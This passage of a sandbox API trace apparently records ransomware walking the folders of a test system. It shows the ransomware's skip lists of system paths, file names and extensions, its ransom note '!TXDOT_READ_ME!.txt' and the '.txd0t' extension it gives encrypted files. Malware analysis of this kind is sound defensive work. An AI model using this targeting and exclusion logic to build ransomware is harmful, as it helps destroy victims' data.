ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0116.730] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0116.730] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0116.730] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\2052", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052") returned="C:\\588bce7c90097ed212\\2052" [0116.730] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\") returned="C:\\588bce7c90097ed212\\2052\\" [0116.730] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2052\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2052\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\2052\\SetupResources.dll" [0116.730] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.730] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0116.730] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0116.730] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0116.730] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0116.730] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0116.730] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0116.730] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0116.730] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0116.730] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0116.743] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0116.743] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0116.743] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0116.743] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0116.743] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0116.743] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0116.743] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0116.744] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0116.744] FindNextFileW (in: hFindFile=0xec1bf0, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3758, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0116.744] FindClose (in: hFindFile=0xec1bf0 | out: hFindFile=0xec1bf0) returned 1 [0116.744] GetProcessHeap () returned 0xe30000 [0116.744] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0116.744] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58ce09c7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58ce09c7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="2070", cAlternateFileName="")) returned 1 [0116.744] StrCmpW (psz1="2070", psz2=".") returned 1 [0116.744] StrCmpW (psz1="2070", psz2="..") returned 1 [0116.744] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0116.744] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0116.744] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="2070", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0116.744] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\windows\\system32\\") returned 0x0 [0116.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\windows\\syswow64\\") returned 0x0 [0116.752] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\windows\\system\\") returned 0x0 [0116.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\windows\\winsxs\\") returned 0x0 [0116.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\appdata\\roaming\\") returned 0x0 [0116.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\appdata\\local\\") returned 0x0 [0116.758] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\appdata\\locallow\\") returned 0x0 [0116.769] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\all users\\microsoft\\") returned 0x0 [0116.770] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="\\inetpub\\logs\\") returned 0x0 [0116.770] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\boot\\") returned 0x0 [0116.770] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\perflogs\\") returned 0x0 [0116.770] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\programdata\\") returned 0x0 [0116.770] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\drivers\\") returned 0x0 [0116.788] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\wsus\\") returned 0x0 [0116.788] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\efstmpwp\\") returned 0x0 [0116.793] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch=":\\$recycle.bin\\") returned 0x0 [0116.793] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="crypt_detect") returned 0x0 [0116.793] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="cryptolocker") returned 0x0 [0116.793] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="ransomware") returned 0x0 [0116.794] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="C:\\WINDOWS") returned 0x0 [0116.794] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="C:\\Program Files (x86)") returned 0x0 [0116.794] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\2070", lpSrch="C:\\Program Files") returned 0x0 [0116.794] GetProcessHeap () returned 0xe30000 [0116.794] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0116.794] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0116.794] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\*") returned="C:\\588bce7c90097ed212\\2070\\*" [0116.805] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\2070\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58ce09c7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58ce09c7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0117.110] StrCmpW (psz1=".", psz2=".") returned 0 [0117.110] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58ce09c7, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58ce09c7, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0117.110] StrCmpW (psz1="..", psz2=".") returned 1 [0117.110] StrCmpW (psz1="..", psz2="..") returned 0 [0117.111] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58c21df5, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58c21df5, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58c21df5, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0117.111] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0117.111] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0117.111] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0117.111] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\") returned="C:\\588bce7c90097ed212\\2070\\" [0117.111] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\2070\\!TXDOT_READ_ME!.txt" [0117.111] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0117.111] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0117.111] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0117.111] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0117.111] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0117.111] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0117.111] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0117.111] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0117.111] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 [0117.111] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="desktop.ini") returned -1 [0117.111] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="autorun.inf") returned -1 [0117.111] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntuser.dat") returned -1 [0117.111] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntldr") returned -1 [0117.111] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="ntdetect.com") returned -1 [0117.111] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootfont.bin") returned -1 [0117.111] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="!TXDOT_READ_ME!.txt") returned 0 [0117.111] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x58bfbbda, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x11af, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="eula.rtf.txd0t", cAlternateFileName="EULART~1.TXD")) returned 1 [0117.111] StrCmpW (psz1="eula.rtf.txd0t", psz2=".") returned 1 [0117.111] StrCmpW (psz1="eula.rtf.txd0t", psz2="..") returned 1 [0117.111] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0117.111] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\") returned="C:\\588bce7c90097ed212\\2070\\" [0117.111] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070\\", psz2="eula.rtf.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\eula.rtf.txd0t") returned="C:\\588bce7c90097ed212\\2070\\eula.rtf.txd0t" [0117.111] PathFindExtensionW (pszPath="eula.rtf.txd0t") returned=".txd0t" [0117.111] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.111] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x58cbaaec, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x13b7e, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="LocalizedData.xml.txd0t", cAlternateFileName="LOCALI~1.TXD")) returned 1 [0117.112] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2=".") returned 1 [0117.112] StrCmpW (psz1="LocalizedData.xml.txd0t", psz2="..") returned 1 [0117.112] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0117.112] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\") returned="C:\\588bce7c90097ed212\\2070\\" [0117.112] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070\\", psz2="LocalizedData.xml.txd0t", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.txd0t") returned="C:\\588bce7c90097ed212\\2070\\LocalizedData.xml.txd0t" [0117.112] PathFindExtensionW (pszPath="LocalizedData.xml.txd0t") returned=".txd0t" [0117.112] StrCmpW (psz1=".txd0t", psz2=".txd0t") returned 0 [0117.112] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0117.112] StrCmpW (psz1="SetupResources.dll", psz2=".") returned 1 [0117.112] StrCmpW (psz1="SetupResources.dll", psz2="..") returned 1 [0117.112] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\2070", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070") returned="C:\\588bce7c90097ed212\\2070" [0117.112] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\") returned="C:\\588bce7c90097ed212\\2070\\" [0117.112] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\2070\\", psz2="SetupResources.dll", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\2070\\SetupResources.dll") returned="C:\\588bce7c90097ed212\\2070\\SetupResources.dll" [0117.112] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0117.112] StrCmpW (psz1=".dll", psz2=".txd0t") returned -1 [0117.112] StrCmpIW (psz1="SetupResources.dll", psz2="bootsect.bak") returned 1 [0117.112] StrCmpIW (psz1="SetupResources.dll", psz2="iconcache.db") returned 1 [0117.112] StrCmpIW (psz1="SetupResources.dll", psz2="thumbs.db") returned -1 [0117.112] StrCmpIW (psz1="SetupResources.dll", psz2=" ransomware ") returned 1 [0117.112] StrCmpIW (psz1="SetupResources.dll", psz2=" ransom ") returned 1 [0117.112] StrCmpIW (psz1="SetupResources.dll", psz2="debug.txt") returned 1 [0117.112] StrCmpIW (psz1="SetupResources.dll", psz2="boot.ini") returned 1 [0117.112] StrCmpIW (psz1="SetupResources.dll", psz2="desktop.ini") returned 1 [0117.112] StrCmpIW (psz1="SetupResources.dll", psz2="autorun.inf") returned 1 [0117.112] StrCmpIW (psz1="SetupResources.dll", psz2="ntuser.dat") returned 1 [0117.112] StrCmpIW (psz1="SetupResources.dll", psz2="ntldr") returned 1 [0117.112] StrCmpIW (psz1="SetupResources.dll", psz2="ntdetect.com") returned 1 [0117.112] StrCmpIW (psz1="SetupResources.dll", psz2="bootfont.bin") returned 1 [0117.112] StrCmpIW (psz1="SetupResources.dll", psz2="!TXDOT_READ_ME!.txt") returned 1 [0117.112] PathFindExtensionW (pszPath="SetupResources.dll") returned=".dll" [0117.112] StrStrIW (lpFirst=".ani|.cab|.cpl|.cur|.diagcab|.diagpkg|.dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui", lpSrch=".dll") returned=".dll|.drv|.hlp|.icl|.icns|.ico|.iso|.ics|.lnk|.idx|.mod|.mpa|.msc|.msp|.msstyles|.msu|.nomedia|.ocx|.prf|.rtp|.scr|.shs|.spl|.sys|.theme|.themepack|.exe|.bat|.cmd|.url|.mui" [0117.112] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 0 [0117.112] FindClose (in: hFindFile=0xec2030 | out: hFindFile=0xec2030) returned 1 [0117.113] GetProcessHeap () returned 0xe30000 [0117.113] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0x68410a0 | out: hHeap=0xe30000) returned 1 [0117.113] FindNextFileW (in: hFindFile=0xec19b0, lpFindFileData=0x599f3a0 | out: lpFindFileData=0x599f3a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58dc5904, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58dc5904, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="3076", cAlternateFileName="")) returned 1 [0117.113] StrCmpW (psz1="3076", psz2=".") returned 1 [0117.113] StrCmpW (psz1="3076", psz2="..") returned 1 [0117.113] StrCpyNW (in: psz1=0xf0daf8, psz2="C:\\588bce7c90097ed212", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212") returned="C:\\588bce7c90097ed212" [0117.113] StrNCatW (in: psz1="C:\\588bce7c90097ed212", psz2="\\", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\") returned="C:\\588bce7c90097ed212\\" [0117.113] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\", psz2="3076", cchMax=1068 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\windows\\system32\\") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\windows\\syswow64\\") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\windows\\system\\") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\windows\\winsxs\\") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\appdata\\roaming\\") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\appdata\\local\\") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\appdata\\locallow\\") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\all users\\microsoft\\") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="\\inetpub\\logs\\") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\boot\\") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\perflogs\\") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\programdata\\") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\drivers\\") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\wsus\\") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\efstmpwp\\") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch=":\\$recycle.bin\\") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="crypt_detect") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="cryptolocker") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="ransomware") returned 0x0 [0117.113] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="C:\\WINDOWS") returned 0x0 [0117.127] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="C:\\Program Files (x86)") returned 0x0 [0117.127] StrStrIW (lpFirst="C:\\588bce7c90097ed212\\3076", lpSrch="C:\\Program Files") returned 0x0 [0117.127] GetProcessHeap () returned 0xe30000 [0117.127] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4b6) returned 0x68410a0 [0117.127] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0117.127] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\*", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\*") returned="C:\\588bce7c90097ed212\\3076\\*" [0117.127] FindFirstFileW (in: lpFileName="C:\\588bce7c90097ed212\\3076\\*", lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58dc5904, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58dc5904, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec2030 [0117.127] StrCmpW (psz1=".", psz2=".") returned 0 [0117.127] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3768b28, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0x58dc5904, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58dc5904, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0117.127] StrCmpW (psz1="..", psz2=".") returned 1 [0117.127] StrCmpW (psz1="..", psz2="..") returned 0 [0117.137] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58d2d05e, ftCreationTime.dwHighDateTime=0x1d64bcf, ftLastAccessTime.dwLowDateTime=0x58d2d05e, ftLastAccessTime.dwHighDateTime=0x1d64bcf, ftLastWriteTime.dwLowDateTime=0x58d9f6dc, ftLastWriteTime.dwHighDateTime=0x1d64bcf, nFileSizeHigh=0x0, nFileSizeLow=0x7f2, dwReserved0=0x390d2a, dwReserved1=0x0, cFileName="!TXDOT_READ_ME!.txt", cAlternateFileName="!TXDOT~1.TXT")) returned 1 [0117.137] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2=".") returned -1 [0117.137] StrCmpW (psz1="!TXDOT_READ_ME!.txt", psz2="..") returned -1 [0117.138] StrCpyNW (in: psz1=0x68410a0, psz2="C:\\588bce7c90097ed212\\3076", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076") returned="C:\\588bce7c90097ed212\\3076" [0117.138] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076", psz2="\\", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\") returned="C:\\588bce7c90097ed212\\3076\\" [0117.138] StrNCatW (in: psz1="C:\\588bce7c90097ed212\\3076\\", psz2="!TXDOT_READ_ME!.txt", cchMax=1078 | out: psz1="C:\\588bce7c90097ed212\\3076\\!TXDOT_READ_ME!.txt") returned="C:\\588bce7c90097ed212\\3076\\!TXDOT_READ_ME!.txt" [0117.138] PathFindExtensionW (pszPath="!TXDOT_READ_ME!.txt") returned=".txt" [0117.138] StrCmpW (psz1=".txt", psz2=".txd0t") returned 1 [0117.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="bootsect.bak") returned -1 [0117.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="iconcache.db") returned -1 [0117.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="thumbs.db") returned -1 [0117.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransomware ") returned 1 [0117.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2=" ransom ") returned 1 [0117.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="debug.txt") returned -1 [0117.138] StrCmpIW (psz1="!TXDOT_READ_ME!.txt", psz2="boot.ini") returned -1 